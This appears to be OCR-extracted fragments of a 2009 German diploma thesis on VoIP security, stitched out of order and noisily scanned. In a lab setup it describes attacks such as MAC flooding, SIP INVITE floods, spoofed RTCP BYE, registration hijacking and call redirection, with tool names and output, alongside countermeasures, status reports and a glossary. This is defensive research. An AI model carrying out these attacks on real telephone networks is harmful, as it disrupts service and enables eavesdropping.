263. kehr lahm und ist weit effektiver als nur ein Angriff gegen ein einzelnes Ger t Ist der VOIP Server nicht mehr erreichbar k nnen sich keine User mehr an diesem anmelden und es k nnen keine Verbindungsanfragen mehr an diesen gesendet werden Schutz gegen Angriff Analyse Siehe Massnahmen MAC Spoofing Kapitel 8 5 2 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 139 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 2 2 Technik und Funktionsweise Der Angreifer sendet Ethernet Frames mit gef lschter MAC Adresse an den Switch Die gef lschte MAC Adresse entspricht der MAC Adresse des Angriffsziels Der Switch tr gt diese MAC Adresse mit dem entsprechenden Port wo der Angreifer verbunden ist in seine MAC Tabelle ein Eine MAC Adresse darf jedoch nur einmal in der ganzen Tabelle vorkommen somit wird der zuvor schon existierende Eintrag mit der MAC Adresse und dem zugeh rigen Port des Angriffziels berschrieben Ab diesem Zeitpunkt werden alle Datenpakete die eigentlich f r das Angriffsziel bestimmt gewesen w ren an den Angreifer gesendet Dadurch ist das Angriffsziel nicht mehr erreichbar bis dieses selbst wieder durch das Senden von Ethernet Frames die MAC Tabelle mit der korrekten MAC Adresse und zugeh rigem Port tiberschreibt Der Angreifer kann jedoch mit Hilfe des Angriff Tools fortlaufe
264. keit Installation Tool 4 Anwendung Tool 4 Das Tool ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 5 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Das Angriffsziel soll mit INVITE Anfragen so berh uft werden dass es nur noch damit besch ftigt ist diese Anfragen abzuarbeiten Der Angriff kann sowohl gegen ein Terminal oder einen SIP Proxy Server gemacht werden Das Verhalten der Angriffsziele kann unterschiedlich sein je nach Ger tehersteller ob sich das Terminal im Ruhezustand oder in einem Gespr ch befindet sind andere Auswirkungen des Angriffes zu beobachten Zusammengefasst kann aber gesagt werden dass dieser Angriff sehr effektiv ist und die Verf gbarkeit der Angriffsziele w hrend und nach dem Angriff nicht mehr gew hrleistet ist DoS Denial of Service Schutz gegen Angriff Analyse Nicht verwenden der Well Kown Ports 5060 von SIP Da jedoch die gebrauchten Ports in Klartext bertragen werden und mit jedem Netzwerkmonitor aufgezeichnet werden k nnen ist dies nur ein bedingter Schutz Switches mit DoS Detektoren verwenden welche solche Angriffe unterbinden Siehe Massnahmen IDS Kapitel 8 5 15 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 72 oo
265. koll nehmen mehr Zeit in Anspruch ab geplant Die unterschiedlichen Tools bssierend suf verschiedene OS f hren sehr oftzu keinem es folgreichen Angriff Abschluss Mehr Tools m ssen evaluiert werden Dokumentation Die get tigten Angriffe und Analysen werden laufend dokumentiert und die Resuliste festgehalten Ebenfalls wird parsilel dazu ein Arbeit Log gef hrt Sitzung mit Betreuer Sitzung mit Betreuer steht am 19 12 2003 an Ziel Bes prechung VOIP Angriffe und allgemeiner Status Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 230 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz 14 4 5 Statusbericht Nr 5 Projektangaben Titel der Arbeit VOIP Security Nummer MAS 05 0220 Datum Ststusbericht Dienstag 23 Dezember 2008 Projektbeteiligte Auftrsggebe Selbsteingebrschtes Thems Betreuer Kurt J rmenn Aastra Telecom Schweiz AG Expete Mathiss Engel Casssrius AG Diplomand Autor Ststusbericht Stefan Schar Asstra Telecom Schweiz AG Zusammenfassung Posten IST Begr ndung a Temine Dank Mehrieistung wieder im Zeitplan Qualit t Leistung Exak tes Arbeiten und Dokumentieren angestrebt 100 susgelsstet zeitliches Wochensoll bei weitem Motivation itten Legende IST Situation Legende Tendenz suf Kurs 9 Verbesserung vom Kurs leicht gleich bleibend sbgewichen 2 stark vom Kurs sbgewichen Verschlechterung bersicht der Arbeite
266. laufen w hrend der Verbindung immer ber den Asterisk Proxy Server Ziel des Angreifers ist es im Namen von User Agent 4129 dem Asterisk Proxy Server eine RTCP BYE Nachricht zu senden um das Gespr ch zwischen 4111 und 4129 zu beenden Damit der Angreifer das Netzwerk nach RTP Paketen abhorchen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Bevor das gespoofte RTCP BYE Paket an das Angriffsziel gesendet werden kann muss ein Vorlage RTCP BYE Paket erstellt werden In diesem Vorlage RTP Paket muss die SSRC Nummer identisch mit der SSRC Nummer sein wie sie auch in den richtigen empfangegen RTP Paketen des Angriffziels ist welche dieses vom seinem Gespr chspartner erh lt Diese SSRC Nummer ist in jedem von User Agent 4129 an den Asterisk Proxy Server gesendeten RTP Paket ersichtlich Um an diese SSRC Nummer zu kommen braucht der Angreifer lediglich mittels Wireshark die RTP Pakete aufzuzeichnen Die ersniffte SSRC Nummer wird mit einem Hexeditor integriertes Tool in BackTrack CD in das Vorlage RTP Paket iSEC RTCP BYE DOS eingetragen Somit sieht die vom Angreifer gesendete RTCP BYE Nachricht so aus als w rde sie von User Agent 4129 stammen tilei root iSEC RTCP BYE DOS KHexEdit Eile Edit View Documents Bookmarks Tools Settings Heip er Mh 3 Be F 0908 N0G0 6689 81 cb 09 Gc W W neu fuer Daten wie ssrc und Port und Mac pcap Wireshark Eile Ed
267. len fe Administrator C Windows system32 cmd exe EtherFlood exe D x CG Users stefan Diplomarbeit VoipSec Angriffe MAC Flood gt EtherFlood exe EtherFlood 1 1 lt c gt 2882 Arne Vidstrom arne vidstrom ntsecurity nu gt http ntsecurity nu toolbox etherf lood Installed network adapters UMware Virtual Ethernet Adapter for UMnet8 UMware Virtual Ethernet Adapter for UMneti Broadcom 59 x 189 188 Ethernet Intel lt R gt PRO Wireless 3945ABG Network Connection Select an adapter number 3 Flooding the network with random Ethernet addresses Untenstehend sind die vom Angreifer gef lschten Ethernet Pakete zu sehen Mit jedem Paket wird dem Switch eine andere MAC Adresse Source vorgegaukelt die er dann auch in seine MAC Tabelle eintr gt WJ D Link pcap Wireshark i a File Edit View Go Capture Analyze Statistics Help Filter Expression Clear Apply aus Source Destination Protocol E oO ernet 71275 OC JE 5 1 J d9 21 2 tT 9e Sal ez 22 trf et 5 067066 c9 16 32 19 11 CE cO 6c 8e a9 04 Ox2277 Ethernet II 1 6 5 06712C f0 04 71 33 53 5d e7 88 49 08 fb 04 0x2277 Ethernet II 71277 5 067204 80 d0O 5a bd 3e aa 1c ba 01 b6 24 a3 0x2277 Ethernet II oe 4A 86 ei b9 1 9 9 a ed 8d 04 Ethernet 1279 5 06733 9c d cb 9 5 F 93 79 d5 86 52 c4A 9x22 Ethernet II 71280 5 067390 53 C0 92 40 75 08 98 9d 8e b0 9b 58 0x2277 Ethernet II t Ethernet 32 RF i gt
268. len VOIP Anwendungen wird RTP verwendet Hierzu sollen besonders gegen die Vertraulichkeit Angriffe get tigt werden Stefan Sch r 19 2 2009 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 223 14 3 Arbeitslog Tag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Montag Dienstag Mittwoch Donnerstag Freitag Samstag Sonntag Datum 07 10 2008 08 10 2008 09 10 2008 10 10 2008 11 10 2008 12 10 2008 13 10 2008 14 10 2008 15 10 2008 16 10 2008 17 10 2008 18 10 2008 19 10 2008 20 10 2008 21 10 2008 22 10 2008 23 10 2008 24 10 2008 25 10 2008 26 10 2008 27 10 2008 28 10 2008 29 10 2008 30 10 2008 31 10 2008 01 11 2008 02 11 2008 03 11 2008 04 11 2008 05 11 2008 06 11 2008 07 11 2008 08 11 2008 09 11 2008 10 11 2008 11 11 2008 12 11 2008 13 11 2008 14 11 2008 15 11 2008 16 11 2008 17 11 2008 18 11 2008 19 11 2008 20 11 2008 21 11 2008 22 11 2008 23 11 2008 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz Arbeitslog Diplomarbeit VOIP Security von Stefan Schar Geleistete Arbeit Eruierung der Tools und Pro
269. ll am Registrar registrierte Terminal beginnt fast zeitgleich zu rufen und h rt erst dann auf wenn dieser Ruf durch den Benutzer beantwortet wird Im unten stehenden Printscreen von SIPSCAN ist zu sehen dass unterschiedliche Respons Codes vom SIP Proxy Server zur ckgeliefert werden So sagt der Response Code 180 aus dass ein aktives Terminal gefunden wurde und dies momentan ruft klingelt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 37 e0 oo Berner Fachhochschule Technik und Informatik Software Schule Schweiz 2 3 3 b Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer sendet die INVITE Nachrichten via Asterisk Proxy Server 10 1 1 10lan alle User Agents welche im File users txt zuvor definiert wurden Wiederum werden die Nachrichten an den Port 5060 per UDP gesendet A SIPScan c File Help Version 1 0 Target SIP Server Target SIP Domain Transport Port 10 1 1 101 10 1 1 101 UDP 5060 J REGISTER Scan Username xtensions File Timeout s I options scan users txt 2 IV INVITE Scan response code s INVITE 200 There was 4 connection timeout while scanning 4003 3 gt gt Found a live extension user at 4111 10 1 1 101 with SIP response code s INVITE 180 There was a connection timeout while scanning 4002 There was a connection timeout while scanning 4115 4 gt gt Found a live extension user at 4119 10 1 1 101 with SIP response code s INVITE 18
270. ller gives your virtual machine access to USB devices Memory and Processors a a task al 2 DSB conicslise Don t Add a USB Controller Hard Disk Network Adapter Properties CD DVD Drive Properties Floppy Drive USS Controller Ready to Complete Die Installation ist geschafft Zum Starten von BackTrack3 ist links unter Inventory die erstellte virtuelle Maschine BackTrack3 zu selektieren und mittels dem gr nen Play Button in der oberen Taskliste zu starten Sollten zuvor die gr n markierten Network Adapter und CD DVD nicht verf gbar sein durch rotes Icon ersichtlich so ist dies v llig normal Diese werden erst durch das Starten der virtuellen Maschine aktiviert Um zu Backtrack3 zu gelangen muss der TAB Console gew hlt werden E testsrv testnetzcitrixt i k 3 5 Eil ene ms BackTrack3 Perform A Processors 1X 1 171 GHz Power State p CCI I Tret Powered On E Guest OS A memory 512 MB Other Linux 32 bit CELE I NB VMware Tools i on Install VMware Tools Bi Notes Virtual Hardware Version Edit Version 7 DNS Name Not Available IP Addresses Not Available Commands El Power Off El Suspend 1 Raser Add Hardware WE Memory 512 MB Y Snapshot Take Snapshot Lel Network Adapter 1 Bridged Configure VM p n A s ri Mach hi Dr CD DVD Drive 1 IDE 1 0 Using file bt3 final
271. lomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 4 Diplomand Name Vorname Sch r Stefan Betreuer Name Vorname J rmann Kurt Experte Name Vorname Engel Mathias Diplomarbeit VOIP Security Beteiligte Parteien Adresse B ndering 8 3312 Fraubrunnen Adresse Aastra Telecom Schweiz AG Ziegelmattstrasse 1 4500 Solothurn Adresse Cassarius AG Steigerhubelstrasse 3 3008 Bern 19 02 2009 oe Berner Fachhochschule tem Technik und Informatik Software Schule Schweiz Telefon E Mail 41 31 767 88 11 Telefon 41 32 655 31 97 Telefon 41 31 384 05 14 S Sch r MAS 06 02 20 sschaer aastra com E Mail kjaermann aastra com E Mail mathias engel cassarius ch Seite 5 oe Berner Fachhochschule tees Technik und Informatik Software Schule Schweiz Inhaltsverzeichnis Kapitel Seite 1 Einleitung 11 1 1 Zielsetzung der Arbeit 11 1 2 Aufbau dieser Arbeit 12 1 3 Testumgebung Setup 14 1 4 Bedingungen um in einem geswitchten Netzwerk Daten zu sniffen abhorchen 15 1 4 1 Angreifer stellt eigenen HUB in das Netzwerk 15 1 4 2 MAC Flooding 15 1 4 3 ARP Spoofing mit Ettercap 15 1 4 4 ARP Spoofing Cain amp Abel 15 1 5 Installation VMware Server und BackTrack3 18 1 5 1 Installation VMware Server 18 1 5 2 _ Installation BackTrack3 20 2
272. marbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 95 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 3 5 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Mit dem Sniffen der Registrierungsdaten und dem Cracken des Passwortes kann ein Registrations Hijacking gemacht werden das heisst der Angreifer kann ein anderes Terminal mit denselben Registrierungsdaten ins Netzwerk bringen Ankommende und abgehende Verbindungen werden ab diesem Moment ber dieses Terminal gemacht Somit kommt der Angreifer auch in Kenntnis ankommender Anrufe welche beim Angriffsziel rufen sollten Er kann sich sowohl f r ankommende wie auch f r abgehende Gespr che unter falscher Identit t am Terminal melden Auch ist ein Telefonieren auf Kosten anderer m glich Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 96 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 3 6 1 Denial of Service AX Registration Reject tesrit t nn Vertraulichkeit Eingesetztes Tool Verf gbarkeit x vnak Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer http www isecpartners com vnak html Hinweise zu Installation Verfiigbarkeit Installation Tool 5 Anwendung Tool 5 Vnak ist unter Linux
273. me frestsrv Server HTTP Port e222 Server HTTPS Port 8333 Vv Allows virtual machines to start and stop automatically with the system lt Back Die bei der Online Registrierung erhaltene Serie Nummer ist einzugeben und mittels Enter zu best tigen VMware beginnt mit der effektiven Installation des Servers was ein paar Minuten Zeit in Anspruch nehmen wird Dabei sind zwei weiter Dialogfenster zu best tigen Danach ist die Basisinstallation von VMware Server abgeschlossen und es kann mit der Installation von BackTrack3 begonnen werden fe Mware Server Registration Information optional You can enter this information later User Name Schar Stefan Company Privat Serial Number XXXXX XXXXK XKXKK XKKKK zeak Ene gt 1 5 2 Installation BackTrack3 Das ben tige BackTrack3 ISO File bt3 final iso kann unter folgendem Link herunter geladen werden http remote exploit org backtrack_download html Dieses File ist in den Ordner C Virtual Machines einzufiigen welcher zuvor mit der Installation von VMware Server angelegt wurde e C virtual Machines Datei Bearbeiten Ansicht Favoriten Extras 2 ar Q Zur ck F A suchen gt ordner ae 2 gt lt WD e Adresse Io lt yirkual Machines x wechseln zu Ordner E Desktop m ES bt3 Final iso 711 626KB ISO Datei B Eigene Dateien Der VMware Server ist mittels Doppelkl
274. n Besprechung mit Bet euer Die Ang iffe suf die Protckolle SIP H323 und RTP sind sbges chlossen diese haben mehr Zeit in Anspruch genommen ab geplant war Die PBX Asterisk und Ascotel wurden f r die Angriffe neu installiert und konfiguriert Die Einarbeitung in die PEX Asterisk hat ebenfalls viel Zeit in Anspruch ge Laufende offene Realisierung Arbeiten Zur Zeit stehen die Analysen und Angriffe suf des Protokoll IAX an ber die Festtage wird such der Angriff auf die VOIP Infrast uktur vorgenommen Dokumentation Die get tigten Angriffe und Analysen werden laufend dotumentiert und die Resultate festgehalten Ebenfalls wird parallel dazu ein Arbeis Log gef hrt Sitzung mit Betreuer 7 Sitzung mit Betreuer steht am 8 1 2009 an Ziel Besprechung VOIP Angriffe und allgemeiner Status Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 231 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz 14 4 6 Statusbericht Nr 6 Projektangaben Titel der Arbeit VOIP Security Nummer MAS 06 02 20 Datum Ststusbericht Dienstag 6 Janus 2009 Projektbeteiligte Auftrsggebe Selbsteingebrschtes Thems Bereue Kurt J mann Aastra Telecom Schweiz AG Experte Mathiss Engel Casssrius AG Diplomand Autor Ststusbericht Stefan Sch Asstra Telecom Schweiz AG cee Tr Begr ndung T ae Temine Dank Mehrleistung wieder im Zeitplan Qualit t Aufwand gross f r Einarbeitung der Tools Motivation 100
275. n HEAP EEE H EAE Trying username monat End of dictionary file reached exiting bt enumiax 1 0 kkk oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 3 2 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Von diesem Angriff selbst gehen nicht so grosse Gefahren aus Der Angreifer kommt lediglich in Kenntnis welche g ltigen Benutzer Konten es auf dem Asterisk Proxy Server gibt Sind diese Benutzer Konten mit den Namen der Benutzer und nicht mit den Rufnummern eingerichtet so weiss der Angreifer nach der Attacke die Namen der Mitarbeiter welche im Betrieb arbeiten wo der angegriffene Asterisk Proxy Server steht Diese Attacke selbst sollte jedoch nicht als allzu harmlos gesehen werden Eine Enumeration ist meist der Anfang weiterer Attacken mit welcher sich der Angreifer einen ersten berblick potentieller Angriffsziele verschafft Mit dem Wissen der g ltigen Benutzer Konten kann der Angreifer gezielte weitere Angriffe starten Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 87 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 3 3 1 TAX Authentication sniffing pwd Attack tesrit t nee Vertraulichkeit x Eingesetztes Tool Verf gbarkeit x Wireshark Downloadlink Quelle de
276. n Abgeschlossene Arbeiten Laufende offene Dokumentation Arbeiten Die Dokumentation wird fertig gestellt es gibt noch einiges zutun Der Kurzvortrag muss noch erstellt werden Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 235 oe Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Gekiirzte Version ohne Kapitel 14 5 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 236
277. n und mir vermittelt haben war es m glich diese Diplomarbeit und somit auch das ganze Studium zum Erfolg zu bringen F r das Korrektur Lesen dieses Diplom Berichtes geb hrt meiner Schwester Sandra Sch r auch ein herzliches Dankesch n Weiter bedanke ich mich bei meinen Angeh rigen Berufskollegen und Freunden welche mich in dieser doch sehr zeitintensiven Phase etwas gestresst und abweisend erlebt haben was Terminanfragen betrafen Bern 19 Februar 2009 Stefan Sch r Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 3 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Ehrenw rtliche Erkl rung Ich versichere dass dieser vorliegende Diplom Bericht durch mich selbst ndig verfasst wurde und s mtliche Texte von mir stammen Es wurden keine Texte w rtlich aus anderen ffentlichen Schriften entnommen Eine Ausnahme bildet hierbei das Glossar und einige im Bericht integrierten Bilder Dazu wurden jeweils Definitionen und Bilder aus dem Internet entnommen welche jedoch mit Quellen Angaben versehen und dadurch als solche gekennzeichnet sind Somit dienen die im Glossar als Web Link eingef gten Quellen angaben zugleich auch als weitere Informationsquelle Weiter versichere ich dass keine anderen als die hier aufgef hrten Quellen verwendet wurden und dass dieser Diplom Bericht nicht zuvor schon einmal einer anderen Pr fungs Kommission vorlag Bern 19 Februar 2009 Stefan Sch r Dip
278. n alle Adressen eines DHCP Servers reservieren DHCP Starvation Attack dadurch dessen Antwort auf weitere Anfragen verhindern und anschlieBend als einziger DHCP Server auftreten Er hat nun die M glichkeit mit einem rogue DHCP Spoofing zu betreiben indem er auf andere DNS Server umleitet die auf Computer verweisen die die Kommunikation kompromittieren Als DHCP Starvation Attack wird ein Angriff auf ein Netzwerk bezeichnet bei dem der gesamte Bereich verf gbarer DHCP IP Adressen auf einen einzigen Client registriert werden Die automatische Zuweisung von Netzwerkadressen an andere Rechner wird so unm glich gemacht Als einen W rterbuchangriff engl dictionary attack frz attaque par dictionnaire bezeichnet man die Methode der Kryptoanalyse ein unbekanntes Passwort oder Benutzernamen mit Hilfe einer Passw rterliste oft auch wordlist oder dictionary genannt zu entschl sseln Als Denial of Service DoS zu Deutsch etwa Dienstverweigerung bezeichnet man einen Angriff auf einen Host Server oder sonstigen Rechner in einem Datennetz mit dem Ziel einen oder mehrere seiner Dienste arbeitsunf hig zu machen In der Regel geschieht dies durch berlastung Erfolgt der Angriff koordiniert von einer gr eren Anzahl anderer Systeme aus so spricht man von Verteilter Dienstblockade bzw DDoS Distributed Denial of Service Der Angreifer versucht bei dieser Attacke dass das Angriffsziel infolge seines Angriffes eine schw chere Ver
279. n bei der Verschl sselung von SIP Nachrichten auf grosse Akzeptanz und wird daher eher selten eingesetzt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 187 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 8 1 4 TLS und SIP SIPS RFC 2246 spezifiziert TLS Transport Layer Security und bietet Sicherheit auf Transportebene tiber ein verbindungsorientiertes Protokoll Somit steht ein Ubertragungskanal in dem die Daten verschl sselt und integer bermittelt werden zur Verf gung Der Standard SIP 2 0 schreibt auch hier vor dass TLS von allen SIP Proxy Servern Redirect Servern und Registrar Servern unterstiitzt werden muss fiir die SIP Terminals ist TLS optional TLS bringt Vertraulichkeit und Integrit t mit sich somit ist auch der Schutz gegen Replay Angriffe gegeben Die SIP Nachrichten werden dabei vollst ndig verschl sselt somit ist nur eine Punkt zu Punkt Absicherung zwischen SIP Proxy Servern m glich Dies sch tzt zwar vor externen Angriffen jedoch haben interne Angreifer immer noch die M glichkeit die in Klartext gefassten SIP Nachrichten abzufangen und auszuwerten 8 1 5 IPsec und SIP IPsec kann zur Absicherung der TCP UDP und SCTP basierten SIP Signalisierung eingesetzt werden Am besten eignet sich IPSec fiir SIP VPN Verbindungen abgesetzte User Agents melden sich am entfernten SIP Proxy Server an Dabei wird die komplette SIP Nachricht verschliisselt diese muss jed
280. n lassen Der Angreifer kommt somit in Kenntnis wer wann Anrufe zu seinem Angriffsziel f hrt Auch kann er diese Anrufe abfangen indem er diese Anrufe schneller beantwortet als sein Angriffsziel Alle ankommenden Anrufe in einer Firma auf einen einzigen User Agent umleiten Der Telefonieverkehr kommt zum erliegen Die Mitarbeiter sind konfus alle Anrufe klingeln nur noch bei einem User Agent Gleichzeitig ankommende Anrufe k nnen nicht alle durch einen einzigen User Agent beantwortet werden und gehen somit verloren Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 57 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 2 8 1 Registration Hijacking Integrit t ee an x Vertraulichkeit x Eingesetztes Tool Verf gbarkeit x registrationhijacker Downloadlink Quelle des Tools Schweregrad http www hackingvoip com sec_tools html 1 leicht 6 schwer Das Tool ist ebenfalls in BackTrack3 enthalten Hinweise zu Installation Verfiigbarkeit Installation Tool 4 Anwendung Tool 4 Das Tool ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 5 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Registration
281. n und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Es gelten dieselben Gefahren wie zuvor beim Registration Hijacking mit dem Tool SiVuS Siehe in Kapitel 2 7 4 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 60 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 2 9 1 Redirection Attack Integritat ees an Vertraulichkeit x Eingesetztes Tool Verf gbarkeit x redirectpoison Downloadlink Quelle des Tools Schweregrad http www hackingvoip com sec_tools html 1 leicht 6 schwer Das Tool ist ebenfalls in BackTrack3 enthalten i Hinweise zu Installation Verf gbarkeit Installation Tool 4 Anwendung Tool 4 Das Tool ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 4 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse User Agents und SIP Proxy Server k nnen auf eine INVITE Nachricht mit 301 MOVED PERMANENTLY oder 302 MOVED TEMPORARILY antworten In diesen Antworten wird zum Beispiel mitgeteilt dass der gew nschte User Agent nicht mehr unter dieser IP Adresse und einem anderen User Account erreichbar ist Dadurch k nnen Anrufe f r einen bestimmten User Agent von einem Angre
282. n und zu interpretieren Besonders hervorgehoben im Bereich Fuzzing hat sich die Security Programmers Group der Universit t von Oulu in Finland Diese entwickelte bereits 1996 ein bekanntes OpenSource Fuzzing Tool mit Namen PROTOS Seit 2001 existiert als Universit ts Spin Off die Firma Codenomicon Ltd an der die meisten der urspr nglichen Programmierer von PROTOS beteiligt sind die das Tool unter dem Namen Defensics weiterentwickelt Beide Tools existieren nach wie vor parallel und beide werden permanent weiter entwickelt Ein Proxy von engl proxy representative Stellvertreter bzw lat proximus der N chste arbeitet als Vermittler der auf der einen Seite Anfragen entgegennimmt um dann ber seine eigene Adresse eine Verbindung zur anderen Seite herzustellen Das Q 931 Protokoll ISDN user network interface layer 3 specification for basic call control wird f r die Signalisierung bei ISDN und H 323 verwendet Aufl sung einer bestehenden Registration Der Angreifer sender eine gespoofte Registration Reject an das Angriffsziel welches danach nicht mehr erreichbar sein wird 19 02 2009 Berner Fachhochschule Technik und Informatik Software Schule Schweiz http de wikipedia org wiki Man In The Middle Angriff http de wikipedia org wiki Nmap http de wikipedia org wiki Nonce http de wikipedia org wiki PBX http www bsi bund de literat studie n VolP index htm http de wikipe
283. n verhindern wodurch Datenpakete im Kreis herum gereicht werden und die ganze Netzwerkbandbreite innert k rzester Zeit belegen Welche Route aktiv ist bestimmt ein Kostenfaktor der aus Abstand zur Root Brige und der Bandbreite des Uplinks zum n chsten Switch berechnet wird Der Angreifer versucht durch das Senden von BPDU Paketen den anderen Switches mitzuteilen dass er den tiefsten Kostenfaktor hat Somit werden die aktiven Routen ber ihn gelegt und er kann den Netzwerkverkehr mitlesen respektive mittels Netzwerkmonitor die Datenpakete aufzeichnen Schutz gegen Angriff Analyse Siehe Massnahmen STP Angriffe Kapitel 8 5 4 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 146 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 4 2 Technik und Funktionsweise Switche kommunizieren ber das Bridge Protokoll miteinander Die dabei gesendeten Datenpakete werden BPDU Bridge Protocol Data Unit genannt In diesen BPDU Paketen teilen sich die Switche ber eine bestimmte Broadcastadresse mit welche Pfadkosten sie haben Die Pfadkosten bestimmen dann welche Routen aktiv und welche inaktiv geschaltet werden sollen Ziel ist es dass zu einem Ziel im Netzwerk immer nur eine Route aktiv ist Dies verhindert dass sich Datenpakete im Kreis drehen und pl tzlich doppelt beim Ziel ankommen Der Angreifer sendet
284. nalisierung eines Rufaufbaues mitlesen bzw ein bestehendes Gespr ch abh ren oder gar die Registrierungsinformationen Benutzername Kennwort zwischen IP Telefonen und einem VolP Server bzw die Authentisierung zwischen VoIP Server und Gateway oder IP Telefon und Gateway abfangen Als MAC Filter wird ein Zugangsschutz f r LANs und WLANs verstanden der nur Ger ten mit bestimmter MAC Adresse Zugang zum Netzwerk gestattet Typischerweise wird der MAC Filter in Form einer Tabelle im Router Firewall abgelegt Die MAC Adresse Media Access Control Adresse auch Ethernet ID oder Airport ID bei Apple oder Physikalische Adresse bei Microsoft genannt ist die Hardware Adresse jedes einzelnen Netzwerkadapters die zur eindeutigen Identifizierung des Ger ts in einem Rechnernetz dient MD5 Message Digest Algorithm 5 ist eine weit verbreitete kryptographische Hashfunktion die einen 128 Bit Hashwert erzeugt MD5 wurde 1991 von Ronald L Rivest entwickelt Die errechneten MD5 Summen kurz md5sum werden zum Beispiel zur Integrit tspr fung von Dateien eingesetzt Das Media Gateway Control Protokoll MGCP ist ein Netzwerkprotokoll zur Steuerung von VoIP Gateways MGCP RFC 2705 ist ein Master Slave Protokoll welches die Steuerinformationen in Klartext wie SIP bertr gt Das VoIP Gateway arbeitet als Slave und wird von einer Vermittlungseinheit engl Call Control Device gesteuert MIDCOM steht f r Middlebox Commmunications und ist ein Dra
285. nd Sicherheitsmechanismus implementiert werden 8 1 1 Authenifizierung der Endger te IP Telefone Soft oder Hardphones sollten sich in einem VOIP Netzwerk authentifizieren m ssen Dies kann ber die MAC Adresse oder mittels Authentifizierung via Benutzernamen und Passwort geschehen Bei der letzteren Variante ist darauf zu achten dass die Passw rter nicht in Klartext ber das Netzwerk transportiert werden und dass unbedingt sichere Passw rter verwendet werden Switche bieten die M glichkeit einer Port Security so dass nur Terminals mit vordefinierten MAC Adressen Zugang zum Netzwerk bekommen 8 1 2 Authentisierung von SIP Nachrichten durch Digest Authentisierung Eine SIP Komponente welche eine Anfrage Nachricht bekommt kann eine Authentisierung der Gegenstelle verlangen Dies geschieht mittels Challenge Response Verfahren Die Komponente sendet der anfragenden Gegenstelle einen Challenge Nonce zu Der Initiator der Anfrage Nachricht berechnet aus diesem Challenge und seinen Credentials einen MD5 Hashwert und sendet diesen dann zur ck Dieser Hashwert kann dann von der empfangenden Komponente gepr ft und so die Identit t des Absenders festgestellt werden Der Standard SIP 2 0 schreibt vor dass alle SIP Komponenten die Digest Authentisierung unterst tzen m ssen Zu beachten gibt es dass dadurch nicht die ganze Nachricht gesch tzt ist sondern nur die Authentizit t der Methode des URI und der Nachrichtenk rper Sollen die br
